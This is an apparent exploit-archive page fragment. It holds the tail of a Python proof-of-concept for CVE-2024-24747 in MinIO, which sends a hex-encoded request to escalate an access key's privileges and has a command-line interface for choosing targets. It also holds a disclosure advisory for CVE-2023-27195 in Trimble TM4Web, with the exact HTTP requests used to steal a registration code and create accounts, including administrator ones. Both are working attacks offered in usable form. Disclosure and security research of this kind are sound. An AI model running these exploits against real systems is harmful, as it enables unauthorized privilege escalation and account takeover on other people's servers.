"0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95"<br /> headers = self.headers_gen(url, sha256, 'POST')<br /> hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336"<br /> content = bytes.fromhex(hex_string)<br /> if self.verify:<br /> response = requests.post(url,headers=headers,data=content,verify=False)<br /> else:<br /> response = requests.post(url,headers=headers,data=content)<br /> status_code = response.status_code<br /> if status_code == 204:<br /> # print("提升" + self.new_accesskey + " 权限成功!")<br /> status_code = 0<br /> else:<br /> print("提升 (promote)" + self.new_accesskey + " 权限失败 (Permission failed)!")<br /><br />if __name__ == '__main__':<br /> logo = """ <br /> ____ ___ ____ _ _ ____ _ _ _____ _ _ _____ <br /> ___ __ __ ___ |___ \ / _ \ |___ \ | || | |___ \ | || | |___ || || | |___ |<br /> / __|\ \ / / / _ \ _____ __) || | | | __) || || |_ _____ __) || || |_ / / | || |_ / / <br />| (__ \ V / | __/|_____| / __/ | |_| | / __/ |__ _||_____| / __/ |__ _| / / |__ _| / / <br /> \___| \_/ \___| |_____| \___/ |_____| |_| |_____| |_| /_/ |_| /_/ <br /> """<br /> print(logo)<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1")<br /> parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")<br /> parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")<br /> parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000")<br /> parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090")<br /> parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.")<br /> args = parser.parse_args()<br /> CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https)<br /> <br /><br /></code></pre>
<pre><code>CVE ID: CVE-2023-27195<br /><br />Description:<br />An access control issue in Trimble TM4Web v22.2.0 allows<br />unauthenticated attackers to access a specific crafted URL path to<br />retrieve the last registration access code and use this access code to<br />register a valid account. If the access code was used to create an<br />Administrator account, attackers are also able to register new<br />Administrator accounts with full rights and privileges.<br /><br />Vulnerability Type: Broken Access Control<br /><br />Vendor of Product: Trimble - Transportation<br />(https://transportation.trimble.com/products/TM4Web)<br /><br />Affected Product Code Base: TM4Web v22.2.0<br /><br />Affected Component: User registration process<br /><br />Attack Type: Remote<br /><br />Impact: Privilege escalation / authentication bypass<br /><br />Attack Vectors:*1. Accessing the last access code *<br /><br />GET /inc/tm_ajax.msw?func=UserfromUUID&uuid=<br /><br />Host: example.host.com<br /><br /><br />*2. Sending PUT request to create a new user account with previously<br />retrieved access code*<br /><br />PUT /inc/tm_ajax.msw<br /><br />Host: example.host.com [...]<br />WEB_UUID=&USERNAME=ccruchet&FIRST_NAME=test&LAST_NAME=test&COMPANY=test&DEPARTMENT=test&ADDRESS1=test&ADDRESS2=test&CITY=test&STATE_CODE=BC&COUNTRY_CODE=CA&POSTAL_CODE=J3L0B8&PHONE=1111111111&PHONE_EXT=&FAX=&EMAIL=test@gmail.com&LANGUAGE=EN&ACCESS_CODE=XXXXXX&pwd1=Password123&pwd2=Password123&isReadonly=false&func=WebUser<br /><br />Discoverer: Clément Cruchet (lutzenfried)<br /><br />References:<br />- Official website: https://transportation.trimble.com/products/TM4Web<br /><br /></code></pre>